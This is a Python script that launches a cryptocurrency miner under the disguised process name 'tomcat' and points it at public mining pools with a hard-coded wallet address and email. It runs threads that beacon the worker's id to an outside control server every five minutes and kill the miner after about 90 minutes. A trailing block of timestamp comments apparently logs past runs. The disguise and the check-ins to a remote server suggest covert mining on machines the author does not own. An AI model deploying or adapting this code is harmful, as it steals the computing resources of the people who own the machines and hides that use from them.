import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:16:04.964452
#2018-02-17 17:03:04.068502
#2018-02-17 18:50:06.950824
#2018-02-17 20:41:07.916390
#2018-02-17 22:28:04.717941
#2018-02-18 00:10:08.320993
#2018-02-18 02:02:01.452857
#2018-02-18 03:48:05.105927
#2018-02-18 05:35:09.125881
#2018-02-18 07:28:03.615066
#2018-02-18 09:16:01.554473
#2018-02-18 11:02:04.502390
#2018-02-18 12:48:03.882998
#2018-02-18 14:30:08.776808
#2018-02-18 16:20:06.092913
#2018-02-18 18:09:04.882538
#2018-02-18 19:55:07.834223
#2018-02-18 21:43:01.691774
#2018-02-18 23:31:07.054311
#2018-02-19 01:17:06.716171
#2018-02-19 03:04:05.008156
#2018-02-19 04:50:03.855592
#2018-02-19 06:35:01.576880
#2018-02-19 08:24:01.779490
#2018-02-19 10:14:03.951773
#2018-02-19 12:02:09.413123
#2018-02-19 13:50:08.758125
#2018-02-19 15:39:08.420049
#2018-02-19 17:26:06.952688
#2018-02-19 19:14:08.533815
#2018-02-19 21:01:04.704063
#2018-02-19 22:48:08.366552
#2018-02-20 00:33:04.599454
#2018-02-20 02:22:05.030095
#2018-02-20 04:12:07.255612
#2018-02-20 05:55:08.575053
#2018-02-20 07:41:05.245898
#2018-02-20 09:26:02.242203
#2018-02-20 11:10:10.163849
#2018-02-20 12:57:01.980871
#2018-02-20 14:41:07.966238
#2018-02-20 16:26:08.528239
#2018-02-20 18:13:01.674143
#2018-02-20 20:06:02.972760
#2018-02-20 21:53:07.606793
#2018-02-20 23:36:07.501752
#2018-02-21 01:21:07.438699
#2018-02-21 03:09:04.010489
#2018-02-21 04:57:03.849359
#2018-02-21 06:44:01.457262
#2018-02-21 08:32:05.755425
#2018-02-21 10:17:08.380406
#2018-02-21 12:05:04.730064
#2018-02-21 13:53:02.207563
#2018-02-21 15:39:06.261768
#2018-02-21 17:29:06.358941
#2018-02-21 19:16:07.959237
#2018-02-21 21:05:09.780258
#2018-02-21 22:52:01.336435
#2018-02-22 00:41:08.177894
#2018-02-22 02:28:06.999132
#2018-02-22 04:15:06.246312
#2018-02-22 06:01:06.576126
#2018-02-22 07:48:05.438102
#2018-02-22 09:37:08.265763
#2018-02-22 11:22:08.904324
#2018-02-22 13:08:08.834269
#2018-02-22 14:56:07.850025
#2018-02-22 16:42:13.430934
#2018-02-22 18:28:01.722181
#2018-02-22 20:21:03.713153
#2018-02-22 22:06:07.711509
#2018-02-22 23:52:05.487565
#2018-02-23 01:41:06.036920
#2018-02-23 03:27:03.936261
#2018-02-23 05:13:04.893808
#2018-02-23 06:57:03.473543
#2018-02-23 08:47:02.299250
#2018-02-23 11:04:05.219322
#2018-02-23 12:59:09.219492
#2018-02-23 14:46:01.354794
#2018-02-23 16:36:04.554455
#2018-02-23 18:23:07.195802
#2018-02-23 20:08:04.308653
#2018-02-23 21:56:04.228878
#2018-02-23 23:44:06.489877
#2018-02-24 01:37:05.982347
#2018-02-24 03:26:06.350368
#2018-02-24 05:11:04.022172
#2018-02-24 06:59:06.944548
#2018-02-24 08:50:09.130779
#2018-02-24 10:58:06.132167
#2018-02-24 12:48:01.294952
#2018-02-24 14:37:05.593354
#2018-02-24 16:26:04.992422
#2018-02-24 18:18:03.990710
#2018-02-24 20:06:01.981791
#2018-02-24 21:49:01.914099
#2018-02-25 01:53:03.055837
#2018-02-25 05:02:04.271347
#2018-02-25 09:51:01.468975